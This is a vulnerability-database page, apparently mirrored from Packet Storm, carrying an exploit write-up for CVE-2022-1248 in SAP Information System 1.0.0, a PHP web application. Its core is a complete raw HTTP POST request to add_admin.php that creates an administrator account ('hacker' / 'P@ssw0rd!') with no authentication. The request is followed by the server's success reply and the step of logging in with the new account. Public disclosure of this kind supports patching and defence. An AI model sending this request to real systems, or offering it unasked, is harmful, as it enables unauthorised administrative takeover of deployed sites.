SAP Information System 1.0.0 Missing Authorization

🗓️ 07 Apr 2022 00:00:00Reported by Mr EmpyType

packetstorm🔗 packetstormsecurity.com👁 267 Views

SAP Information System 1.0.0 - Improper Authentication, Missing Authorization Vulnerabilit

Reporter	Title	Published	Views	Family All 11
CNNVD	SAP Information System 访问控制错误漏洞	6 Apr 202200:00	–	cnnvd
CNVD	SAP Information System Access Control Error Vulnerability	8 Apr 202200:00	–	cnvd
CVE	CVE-2022-1248	6 Apr 202203:10	–	cve
Cvelist	CVE-2022-1248 SAP Information System POST Request add_admin.php improper authentication	6 Apr 202203:10	–	cvelist
EUVD	EUVD-2022-24581	3 Oct 202520:07	–	euvd
NVD	CVE-2022-1248	6 Apr 202203:15	–	nvd
OSV	CVE-2022-1248	6 Apr 202203:15	–	osv
Prion	Design/Logic Flaw	6 Apr 202203:15	–	prion
Positive Technologies	PT-2022-13747 · Sap · Sap Information System	6 Apr 202200:00	–	ptsecurity
RedhatCVE	CVE-2022-1248	5 Feb 202523:02	–	redhatcve

`# Exploit Title: SAP Information System 1.0.0 - Improper Authentication  
# Date: 06/04/2022  
# CVE: CVE-2022-1248  
# Exploit Author: Mr Empy  
# Software Link:  
https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html  
# Version: 1.0.0  
# Tested on: Linux  
  
  
Title:  
================  
SAP Information System 1.0.0 - Improper Authentication  
  
  
Summary:  
================  
SAP Information System version 1.0.0 suffers from an improper  
authentication vulnerability that allows a malicious user to create an  
administrative account without needing to authenticate. The POST request is  
sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The  
problem occurs due to lack of session verification in the request.  
  
  
Severity Level:  
================  
7.3 (High)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L  
  
  
Affected Product:  
================  
SAP Information System version v1.0.0  
  
  
Steps to Reproduce:  
================  
  
Steps to Reproduce:  
  
1. Copy this request and change the host and send it to the server:  
  
############################################  
  
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1  
Host: target.com  
Content-Length: 345  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI  
Origin: http://target.com  
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c  
Connection: close  
  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="username"  
  
hacker  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="password"  
  
P@ssw0rd!  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="user"  
  
admin  
------WebKitFormBoundaryYELEK8fMdX63l0iI--  
  
############################################  
  
Reply:  
  
############################################  
  
HTTP/1.1 200 OK  
Date: Tue, 05 Apr 2022 16:15:46 GMT  
Server: Apache  
Vary: Accept-Encoding  
Content-Length: 267  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
<script type="text/javascript">setTimeout(function () { swal("Add Admin  
Successfully!","Message!","success");}, 1000);</script><script  
type="text/javascript">setTimeout(function(){window.location =  
"/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>  
  
############################################  
  
2. Go to the login page and enter the hacker:P@ssw0rd! credential. After  
that you will be logged in with an administrative account.  
`

07 Apr 2022 00:00Current

7.3High risk

Vulners AI Score7.3

EPSS0.00631